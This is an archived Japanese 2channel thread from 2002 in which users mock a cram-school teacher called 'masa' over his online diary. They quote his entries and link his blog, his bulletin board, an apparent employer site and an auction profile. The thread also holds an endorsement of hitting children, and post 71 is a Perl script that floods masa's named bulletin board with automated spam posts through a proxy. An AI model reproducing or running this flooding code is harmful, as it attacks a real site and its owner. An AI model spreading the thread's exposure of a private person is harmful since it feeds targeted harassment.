2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【最低】DQN塾講師masaをヲチ【最悪】

1 :ハァハァ:02/06/30 01:16 ID:ZvsFOQ19
塾講師でありながら、「小学生の授業はウザ!!!」などの
暴言を連発し、さらに上司である社長も「バカ社長」呼ばわり
するmasa。
掲示板に忠告があると「口悪いのもあ〜いうこと書くのもただの
個人のHPの日記なので勘弁してやってください」とばかり
書いて相手にしないmasaの日記をマターリヲチしよう。

http://www.matrix-dejavu.com/cgi-bin/F1/hcc_fd.cgi?logfile=F14666.log

掲示板は

http://www.poppet21.com/poco/bbs1/pt.cgi?room=masa

2 :名無しさん@ゴーゴーゴーゴー!:02/06/30 01:22 ID:Hdt5+N6G
おりゃー2ゲト
http://www2.ocn.ne.jp/~jukuyu/

3 :名無しさん@ゴーゴーゴーゴー!:02/06/30 02:01 ID:2qesZCqb
今だ! 3ゲットオォォォォ!!
 ̄ ̄ ̄ ̄ ̄ ̄∨ ̄ ̄
         ∩ ∩ 
        〜| ∪ |         (´´  
        ヘノ  ノ       (´⌒(´  
       ((つ ノ⊃≡≡≡(´⌒;;;≡≡≡
         ̄ ̄ ̄(´⌒(´⌒;;
         ズザーーーーーッ


4 :名無しさん@ゴーゴーゴーゴー!:02/06/30 02:17 ID:hwyUVxTw
こいつの写真キボンヌ

5 :名無しさん@ゴーゴーゴーゴー!:02/06/30 02:18 ID:hwyUVxTw
チビは逝ってよし

6 :名無しさん@ゴーゴーゴーゴー!:02/06/30 02:21 ID:3VWFBuBX
  今だ!5ゲットオォォォォォォ!!
   ̄ ̄ ̄ ̄∨ ̄ ̄       
                   (´´  
     (UU)       (´⌒(´  
     (- ̄-)≡≡≡(´⌒;;;≡≡≡
      ̄ ̄ ̄(´⌒(´⌒;;
        ズザーーーーーッ

7 :名無しさん@ゴーゴーゴーゴー!:02/06/30 02:23 ID:3VWFBuBX
   (U U)
   (- ̄-)ウツダ、シノウ…

8 :名無しさん@ゴーゴーゴーゴー!:02/06/30 02:24 ID:hwyUVxTw
■■■
ノノノ・_・)<私はmasa…
朝起きてすぐオナーニしてしまった塾講師…
あぁ〜スッキリしたわ…


9 :名無しさん@ゴーゴーゴーゴー!:02/06/30 02:26 ID:2qesZCqb
     ∧_∧∩ / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
    ( ´∀`)/< 先生!ウザい小学生ってどんなのですか?
 _ / /   /   \________________
\⊂ノ ̄ ̄ ̄ ̄\
 ||\        \
 ||\|| ̄ ̄ ̄ ̄ ̄||
 ||  || ̄ ̄ ̄ ̄ ̄||
    .||          ||



10 :名無しさん@ゴーゴーゴーゴー!:02/06/30 02:31 ID:hwyUVxTw
|
|((((〜〜、
|((((((_ )
|\)/^~ヽ|
| 《 _  |
|)-(_//_)-|)  masa・・・・・
|厶、   |
||||||||| /
|~~~_/
|  )
|/
|
|




11 :名無しさん@ゴーゴーゴーゴー!:02/06/30 02:34 ID:hwyUVxTw
    ∧_∧∩ / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
  ( ´∀`)/< 先生!高校墜ちました!
 _ / /   /   \___________
\⊂ノ ̄ ̄ ̄ ̄\
 ||\        \
 ||\|| ̄ ̄ ̄ ̄ ̄||
 ||  || ̄ ̄ ̄ ̄ ̄||
    .||          ||


12 :名無しさん@ゴーゴーゴーゴー!:02/06/30 02:43 ID:2qesZCqb
>>11
masaに教えて貰え(w

13 :かおりん祭り ◆KAORinK6 :02/06/30 02:44 ID:GN7USnjG
( ^▽^)σ)^▽^)プニョプニュ 新スレおめでとうございまーす♪
 

14 :名無しさん@ゴーゴーゴーゴー!:02/06/30 15:11 ID:2qesZCqb
最悪だな。

TITLE:6月22日(土)


やっちまった・・・
覆面パトに捕まった・・・
スピードで・・・
最悪・・・
携帯の電池も何度も無くなるしガソリンも無くなるしなにもかもが最悪の日だった!!!
明け方までは。
昼からは普通に買い物とかして楽しかったけど・・・
はぁ・・・警察ってホントムカツク・・・
塾の先生やってるんだ〜?俺の息子も教えてもらおうかな〜(笑)だとよ!!!
ふざけるな!誰が教えるか!入塾してきたらおもいっきりひいきして差別しまくってやる!って思いました。
つーかあんなところで取り締まりしても何の意味もないべ・・・
くそ〜!!!
明日も出かけます。


15 :名無しさん@ゴーゴーゴーゴー!:02/07/01 21:42 ID:B3svjXMp
こいつ、昔晒されてなかったっけ?


16 :あぼーん:あぼーん
あぼーん

17 :名無しさん@ゴーゴーゴーゴー!:02/07/01 23:25 ID:B3svjXMp
http://saki.2ch.net/qa/kako/963/963345743.html

これか。

18 :あぼーん:あぼーん
あぼーん

19 :名無しさん@ゴーゴーゴーゴー!:02/07/02 00:32 ID:BpVOgAci
masa(・A・)イクナイ!

20 :名無しさん@ゴーゴーゴーゴー!:02/07/02 02:18 ID:SVHyVSOi
これ、笑える。
今切られたらローンも払えなくなるだろ(w


TITLE:7月1日(月)


今日は一番楽な日だったはずなのだが、とんでもなく忙しかった・・・
朝早くからお世話になってる社長さんと打ち合わせして、その後設計士の人と打ち合わせして、会社行って仕事の山・・・
今日はフル活動だった・・・
ってかバカ社長かなりむかつくんだけど・・・
はぁ・・・早く家建てて色々しっかりできたら速攻辞めたい〜(>_<)
こんな社長の下ではやってられんぜよ・・・
全てを俺に任せまくっていて、こんな安月給&態度とられたら嫌になるに決まってるじゃん・・・
過去2回大喧嘩してもまだそれが分かってないんだなぁ・・・
あんなに必死に頭下げるから仕方なく残ってやってるっていうのに・・・
もう3度目の正直、今度また俺キレたらその場で辞めてやるぜ。



21 :名無しさん@ゴーゴーゴーゴー!:02/07/02 09:44 ID:A4C+zF7m
トップが重すぎ。
何アフィリエイトしてんだよ( ゚Д゚)ゴルァ!!

ってか、いくら儲かってるんだろ?

22 :名無しさん@ゴーゴーゴーゴー!:02/07/02 09:54 ID:vrDd/oQ/
掲示板83のレスより。

>masa > 空論なんてつまらん。盛り上げるタメにも
>どんどん意見してくれたほうがいいのだが・・・ (2002/06/11(Tue) 19:20:24)

荒らして欲しいそうです(w

23 :名無しさん@ゴーゴーゴーゴー!:02/07/02 15:22 ID:PuzpWOFf
    ∧_∧∩ / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
  ( ´∀`)/< 先生!高校墜ちました!
 _ / /   /   \___________
\⊂ノ ̄ ̄ ̄ ̄\
 ||\        \
 ||\|| ̄ ̄ ̄ ̄ ̄||
 ||  || ̄ ̄ ̄ ̄ ̄||
    .||          ||


24 :名無しさん@ゴーゴーゴーゴー!:02/07/03 13:35 ID:eTvhJAoo
masaの画像キボンヌ

25 :名無しさん@ゴーゴーゴーゴー!:02/07/03 13:37 ID:eTvhJAoo
7月2日の日記より

久しぶりに那須ハイにでも行っちゃおうかな〜♪
那須ハイならお金使わなくても年間フリーパスで遊べちゃうし♪
久しぶりに週末に凄い楽しみな事ができた♪
やっぱりこうでなくっちゃね☆

那須ハイランドしか行くとこがない模様。

26 :名無しさん@ゴーゴーゴーゴー!:02/07/03 13:39 ID:eTvhJAoo
【大至急】masaの画像キボンヌ【大至急】

27 :名無しさん@ゴーゴーゴーゴー!:02/07/03 17:00 ID:w5MFN1RR
チビで永久脱毛するくらいヒゲが濃いんだろ?
写真は地雷のような気がするがな。

28 :名無しさん@ゴーゴーゴーゴー!:02/07/03 17:05 ID:ZJtoDwwa
>仕事なんてしてないで、新しい土地のところで色々やりたいよぉ〜

こんな塾の先生に教えられる子ども達に乾杯。

29 :名無しさん@ゴーゴーゴーゴー!:02/07/03 17:22 ID:iaiCVm5v
│・∀・) マサトアソビタイナ… 

│彡サッ   デモヤメタ…カエル!

30 :みんとぶるう@職場:02/07/03 19:08 ID:b3tB0QPL
ていうか・・・・・漏れ同業者なんスけどね。

氏ね、本気で氏ね!!!
じゃ、30分から授業なのでまた。

31 :名無しさん@ゴーゴーゴーゴー!:02/07/03 20:00 ID:eTvhJAoo
(・A・)masaイクナイ!

32 :名無しさん@ゴーゴーゴーゴー!:02/07/03 23:40 ID:ZJtoDwwa
>>30
塾の先生って、ぶっちゃけ、生徒をどう思うわけ?
そりゃ人間だから、好き嫌いはあると思うけど……


33 :みんとぶるう:02/07/04 04:42 ID:yX8Cs9Vb
そりゃ実際はありますよ?
懐いてくれる方が正直嬉しいし、学級崩壊ガキはウザい。
でも、それでオマンマ食べとるわけでしょう、向き合わなアカンって
意識だけはないと駄目かなって思うし、コイツみたいな意識だと子供も
察知するし怖いですね。

でも、授業中騒ぐんなら叩きもするし、逆ギレするなら殴りもするけど、
そういうのは親呼んで承諾得とくし。一回ヒー言わせとけば、きちんと
席についてノート取れる子に成長できるから、僕は体罰を絶対悪とは
思ってません。個性に応じて分かるよーに指導したまでですから、
口で言うて分からん個性に育てた親の責任もこっちは言うし。

でも、そういうのコミでやってるわけでしょ、消防クラスって。
漏れもバイトですけど、「学力崩壊と闘うぞ!」ってな自覚の方が
デカくて普通でしょ?そう考えたら本気っすわこっちも。
それでウゼーってアンタねぇ・・・・・・。

ウザくない仕事があったら漏れに教えろ!・・・・・って思いますね。

34 :Passing Wind:02/07/04 22:15 ID:ziCaIfBW
>>33見てちょいマジレス。
俺、たぶんmasaとほぼ同世代で中学受験した口だけど……
小学校時代の塾の先生達のお陰でそこそこ有名な進学校に行けたし、
10年以上経った今でも年賀状やメールをやりとりしてる先生だっている。
もしかしたら、先生からしたらウザがられてたのかもしれないけど、
いつも熱心に教えてくれたし、時には厳しいことも言ってくれた。
今の自分は小学校時代の塾の先生がいてくれたからこそだとも
思ってるし。

そういう意味では、masaの日記は禿しく萎えたね、色々な意味で。
そりゃウザい生徒だっているだろうけど、プロなんだからそれを
誰もが見られるところに書くのは反則だって。いくら「個人の日記」
だとしても、masaに教えられてる生徒が見たらどう思うんだろ?
俺だって、今の職場にはウザいやつが腐るほどいるよ。
何もできないくせに、ちょっと人気があるからって態度でかい
やつとか、本当は俺たちのことをバカにしてるんだけど、
立場上ヘイコラしてるやつとか。ま、態度でかかったやつは
2人ほどマスゴミに叩かれて辞めたけどな(w
でも、そういう仕事上の憂さ晴らしをネットでしたらシャレにならん。
だから、黙ってるのがプロとして最低限の礼儀だと思うけどね。

>>33をみて、ちょっとだけ救われたわ。お疲れさま。


35 :マサ(・A・)イクナイ!:02/07/04 22:31 ID:yXE1usZT
マサの勤務先って

  ttp://www09.u-page.so-net.ne.jp/dk9/yakushin/yakushin/

か?デザインくりそつだからすぐ分かったよ(w)
ここ、ネットで商品を売っているのに解約方法とか
のってないし、訪問販売法違反じゃないか。
って優香、城北ってうちのすぐ近所じゃん。
禿しく鬱だ。。。

36 :みんとぶるう:02/07/05 02:01 ID:9UdDjl8v
>>34
いえいえ。漏れ、11月に28になるんだけど、きっと君と近いと
思うんだ。
でもさー、ぶっちゃけ言わせてもらうとこの業界、ちく裏みたいで
申し訳ないんだが、グチャグチャだよ?
漏れ含めてダメ人間多いし。ちょっと語っていいかなあ?
あ、ウチの勤務先がそうだって話じゃなく、ツレんとこも含めて。


37 :Passing Wind:02/07/05 14:09 ID:8mlI+/9o
>>36
是非キボンヌ。

38 :名無しさん@ゴーゴーゴーゴー!:02/07/06 02:48 ID:z8a0PNWB
age

39 :なんちゃってネトア ◆2swboMiw :02/07/06 03:15 ID:Vs6WsEJr
バイトで塾の講師してるけど・・・
生徒って可愛く思えないのかな?
私はバイトだけど担当してる生徒の事は本当に好きだし
そりゃ、態度がでかくて、物投げてきたりして
刃物とか飛んできた時には愚痴ったし
担当降りようかとも思ったけど
生徒のこと、本当に好きだから続けてる。
ウザイと思ったら社長とどうこうじゃなく
すぐにでも辞表出せば良いのに・・・
本当に生徒を好きじゃないと続かないもん。絶対。

と、いきなり長々と思いのままに書いてすみません。
読んでくれた方々、駄文失礼しました。

40 :名無しさん@ゴーゴーゴーゴー!:02/07/06 03:44 ID:7kvbSuWR
おれも厨房の時、塾いってたけど教師も生徒もそりゃいろいろ
問題あった。特に、若い熱血教師はじつは結構邪悪である子供たちに
情熱を砕かれて、すぐきれる怖い教師に変貌というのが多かった。
案外、無愛想でドライやつほどうまく生徒との関係を築いていたのも
印象深い。
>>34
関係ないけど同じ学年だ。あなたと。おれも28です。最後のベビーブーム世代
で受験戦争も大変だったよ。中学も14クラスだったし。
ちなみに今、その中学は5クラスだそうです・・。時代はかわったなぁ。

41 :なんちゃってネトア ◆2swboMiw :02/07/06 04:11 ID:Vs6WsEJr
>>40
うちの塾で見ると、
熱血ってのは意外と職業として「塾講師」を見てる気がする。
ちょっと冷めた感じの授業してる人が教員志望だったり
生徒のこと考えてたりする感じ。

>>33
小学生は大変だけどちゃんと教えれば素直だもんね。
ウザイ<生徒が可愛い
だよね♪
語り、期待してます。

42 :みんとぶるう:02/07/06 12:28 ID:N86lzXkj
えー、基本的に塾講師は司法試験多浪生が僕を含めてメッチャ多いです。
教員採用試験などの人もいますけど、そういう人も数年でパッと辞めて
いくのですが、永年勤務していくうちにベテランになり定着というのが
定番。
しかし、司法試験受験生って、正義感が強いとか一日中勉強とか言われますが
それは全くの偏見です。
確かに我々は目的意識を持って社会正義の実現云々で受験しているのは
事実ですが、ぶっちゃけ、『組織嫌い!命令されるのヤダ!』というワガママさが
人一倍強いという一面もあります(アニヲタも多い)。
だもんだから、アダルトチルドレン率は社員(事務)ですら高く、これは
お互い様ですが常識のなさに閉口することも多いですね。

で、一番危険なのが、身元調査を採用時にしないんですよ!!!!!
多くの塾が、既卒者の場合は履歴書に書いた通りの学歴が鵜呑みに
されてしまって、卒業証明書までいらないんですね。
僕も龍谷なんですが、龍谷つったら龍谷で通ってしまう。
あれっ、て感じですよね。だから、慶應と書いておけば慶應になるし、
同志社と言えば同志社で通ったことでしょう。さすがに詐称教師はウチには
いなさそうですが、業界全体がそういうノリ。

で、大手さんで首都圏になるとスゴいことになってるんです。


43 :みんとぶるう:02/07/06 12:41 ID:SLlMMFX9
中学受験の名門の某社さんなんか社長は偏差値45未満(帝京未満)の
私大出身、なんていうのはまあいいとしましょう。

こんな事件がありまして。
慶應卒のAという講師の詐欺なんですが、架空の有名私立の編入試験が
極秘にあるぞと持ちかけては父兄から大金をせしめまくってドロン、
をくり返してたんですよ。
いや、編入が極秘にないこともないんです。
例えば東京の中高一貫の某超エリート学校は高校からの募集はないけど、
灘ではない兵庫の某私立と編入しあえるし、ただ、非公開。
裏口にしても、慶應の附属とかだと何かホントっぽいじゃないですか、
すっかり騙されて支払ってみたら、「ナンボ何でも点数足りなすぎ、
もう少し上乗せしたら中学は無理だが高校では」などというケースも。

で、遂に捕まっちゃった。
調べて見れば慶應なんて大嘘、日大だったんです。
バレそうにななっては辞めて次のところにしていたんですが、この業界、
横の情報交換がないんで、「ウチにこんな講師がいて問題に」なんて
話は格好のスキャンダルだからむしろ箝口令だったんですね。
それを悪用してた。

だから、こういう塾っていうのも裏舞台は怖いぞ、と。

44 :みんとぶるう:02/07/06 12:52 ID:SLlMMFX9
>>40
ああ、それじゃあ分かると思いますが。
「先生龍谷なのぉ〜?」
「るっせーな〜、俺らの頃は偏差値60超えてたのっ!」
「嘘だぁ〜!!!」
ってな会話はよくあります、つらいっす(w
おまけにカリキュラムが違うから、今の中3偏差値50なんて、僕らの
学年だったらビリッケツですよ確実に。もうね、クラスのヤンキーでも
もうちょっとできとったわ、みたいな。

>>40
そうそう。適度に距離おいてね。

45 :Passing Wind:02/07/07 00:05 ID:UT0NVz88
>>42
いくら身元調査しないといっても、先生の質は変わらないわけだから……
生徒の質問にしどろもどろになったりして、結局淘汰されたりしないの?
されないんだったら、逆選択が起きそうだ(w


46 :みんとぶるう:02/07/07 01:36 ID:3gvHVman
>>45
でも、話術でどーにかなったりねー。
教えるのと知ってるのは別、みたいな。

というか、こういう言い方しちゃアレだけど塾講師ってドキュばっかっすよ。
ホント賢かったら学術・金融・官僚・医学・法曹に巣立っていくでしょ。
結局教育は大卒最底辺の仕事になってくるんですわ。

47 :Passing Wind:02/07/07 01:56 ID:UT0NVz88
>>46
う〜〜ん、なまじっか自分の先生がいい人だっただけに
信じたくないけど……
現場の人がそういうのだからそうかもね。

でも、>>46も将来的には法曹界に旅立つわけでしょ?
中継ぎみたいな形で人材が供給されてるわけだから
全員DQNでもないと思うけど。

ま、masaはDQNケテーイだけどね。


48 :みんとぶるう:02/07/07 10:04 ID:XN1Wxsaw
>>47
いやでも、今いるとこではベストでありたいなって人は多いです。
あと、イイ先生は「落ちこぼれた事実は受け入れつつも、まあいいか、
折角ここにきたんだし」とドカッと構えてる人です。
だから、イイ先生であることに何の変わりもありません。
そういうことでいいですかね?
どーせ他に逝くとこないし、ふてくされても面白くないし、みたいな。

49 :名無しさん@ゴーゴーゴーゴー!:02/07/08 00:12 ID:sLX7xWZ+
日記の更新が止まってるぞ(゚ロ゚)モルァ!!

50 :みんと:02/07/08 00:14 ID:gHIIq/uh
アホくさ・・・

51 :みんと:02/07/08 00:16 ID:gHIIq/uh
sage

52 :Passing Wind:02/07/08 06:02 ID:sLX7xWZ+
>>48
じゃあ、塾長とか、そういうのもやっぱりDQN入ってるってことですかね?
masaがそうであるように……


53 :名無しさん@ゴーゴーゴーゴー!:02/07/08 09:12 ID:TsVnWSeV
http://rating.auctions.yahoo.co.jp/jp/show/rating?userID=itoumasahiro

マサの評価だそうです(w

54 :名無しさん@ゴーゴーゴーゴー!:02/07/08 09:35 ID:XiDtD3CB
掲示板が死んでるよぉ゚・(ノД`)・゚・

55 :みんとぶるう:02/07/08 12:16 ID:qDuygwSX
>>52
ええ。
当たり外れ大きいっすよここの業界。

56 :Passing Wind:02/07/08 12:45 ID:P69MkVfr
>>55
ううむ、俺の小学校時代の塾が、塾長のおいたで倒産したのを思い出した。
激しく鬱だ……

慶應をダシにした詐欺事件って、確か裏口入学がどうのこうのってのだっけ?
なんかおぼろげに覚えてるような気がする。


57 :みんとぶるう:02/07/08 13:18 ID:qDuygwSX
>>56
そうそう。
桐蔭とか慶應女子の編入の話を持ちかけてね

58 :名無しさん@ゴーゴーゴーゴー!:02/07/09 10:33 ID:SwrnBN/r
masaをまつれ〜

よってage

59 :masa祭りage:02/07/09 21:45 ID:2I/xe8fQ
/|         |  |_____ΦΦΦΦΦΦΦΦΦΦΦ||ΦΦΦ
  |         |  | ̄ ̄ ̄ /|                    ||
  |         |  |   / /|TTTTTT   TTTTTTTTTT||TTTTT
  |        /\ |  /|/|/|^^^^^^ |三三| ^^^^^^^^^^^||^^^^^^^
  |      /  / |// / /|
  |   /  / |_|/|/|/|/|
  |  /  /  |文|/ // /
  |/  /.  _.| ̄|/|/|/         Λ_Λ
/|\/  / /  |/ /           (___)
/|    / /  /ヽ            /〔 祭 〕〕つ
  |   | ̄|  | |ヽ/l            `/二二ヽ
  |   |  |/| |__|/   Λ_Λ     / /(_)
  |   |/|  |/      ( ´∀`)   (_)    Λ_Λ
  |   |  |/      // /  ^ ̄]゚        (`   )
  |   |/        ゚/ ̄ ̄_ヽ         ⊂〔〔 祭 〕
  |  /         /_ノ(_)          ┌|___|
  |/          (__)             (_ノ ヽ ヽ
/                                (_)


60 :masa祭り:02/07/09 23:58 ID:2I/xe8fQ
http://peachfizz.com/rental/chat.cgi?pass=_975923247088

チャットでmasaと直接話そう!

61 :masa祭り:02/07/10 00:12 ID:3lh1lu04
ちょっと覗いたら……

masa(♂) 「 か〜なり荒らされてる〜多分2ちゃんかどっかで紹介されたんだべ。別に気にしてないけど。
masa(♂) 「 ま〜個人のHPで俺のとこみたいな内容でおもいっきりみんなに知られてるHPはそんなもんよ♪
masa(♂) 「 そんなのいちいち気にしていたらHPは出せないよ(笑)

だそうです(w

62 :Passing Wind:02/07/11 03:00 ID:NUWmdXPh
塾で教えてると、やっぱり生徒とくっついたりってあるんでしょうか?

63 :名無しさん@ゴーゴーゴーゴー!:02/07/11 20:28 ID:R/57mqZP
日記より
なんだかまた色々悩み事が増えちゃった・・・
全部お金の問題だけど・・・
なんだか今月は色々重なっちゃってほんっと生活切りつめていかないと乗り越えられない・・・
今日解体屋も買った土地に入って、前の建物解体始めたし、その他ごたごたも沢山・・・
解体しないでリフォームした方がいいような気もしないでもないが・・・
解体費用500万だって・・・
だぁ・・・宝くじ当てるしかねぇなぁ・・・
仕事は急には変われないし・・・
おばあちゃんにも返さないといけないし・・・
家も建てなきゃいけないし・・・
諸費用も払わないといけないし・・・
宝くじに全てがかかってる・・・

誰か慰めてやれば?(w

64 :名無しさん@ゴーゴーゴーゴー!:02/07/12 02:35 ID:6sNCg1QB
age

65 :名無しさん@ゴーゴーゴーゴー!:02/07/12 03:07 ID:rjDitqPj
>>63
慰めてきてやったぜ。

66 :名無しさん@ゴーゴーゴーゴー!:02/07/14 22:53 ID:Z31f9K3y
age

67 :名無しさん@ゴーゴーゴーゴー!:02/07/14 23:09 ID:A37jgfE+
sage

68 :名無しさん@ゴーゴーゴーゴー!:02/07/14 23:14 ID:QM5ePi68
>>17
同類も復活

【アクセス】復活した堕落誌ZZをマッタリとヲチ【至上主義】
http://kaba.2ch.net/test/read.cgi/net/1025253391/l50

69 :名無しさん@ゴーゴーゴーゴー!:02/07/15 11:19 ID:ymn1x06O
age

70 :名無しさん@ゴーゴーゴーゴー!:02/07/17 15:39 ID:pfeHY6zQ
(・A・)イクナイ!(・A・)イクナイ!(・A・)イクナイ!(・A・)イクナイ!
(・A・)イクナイ!(・A・)イクナイ!(・A・)イクナイ!(・A・)イクナイ!
(・A・)イクナイ!(・A・)イクナイ!(・A・)イクナイ!(・A・)イクナイ!
(・A・)イクナイ!(・A・)イクナイ!(・A・)イクナイ!(・A・)イクナイ!
(・A・)イクナイ!(・A・)イクナイ!(・A・)イクナイ!(・A・)イクナイ!
(・A・)イクナイ!(・A・)イクナイ!(・A・)イクナイ!(・A・)イクナイ!

71 :名無しさん@ゴーゴーゴーゴー!:02/07/17 20:08 ID:QFC+FlcI
use Socket;

$target = 'http://www.poppet21.com/poco/bbs1/pt.cgi?room=masa';
$body = 'mode=msg&room=masa&name=%3cxmp%3e@num&subj=%3cxmp%3e@num&comment=%3cxmp%3e@num';
$length = length ($body);

for ($i = 100; $i < 200; $i++) {
$iaddr = inet_aton ($proxy) or die "host $proxy was not found.";
$sock_addr = pack_sockaddr_in($port, $iaddr) or die "Cannot pack.";
socket (SOCK, PF_INET, SOCK_STREAM, 0) or die "socket: $!";
connect (SOCK, $sock_addr) or die "connect: $!";
select (SOCK); $ |= 1; select (STDOUT);
print SOCK "POST $target HTTP/1.0\n";
print SOCK "User-Agent: Giko Storm Writer\n";
print SOCK "Content-Length: $length\n";
print SOCK "Content-Type: application/x-www-form-urlencoded\n\n";
$buf = $body;
$buf =~ s/\@num/%28$i%29/gi;
print SOCK "$buf\n\n";
}

23 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)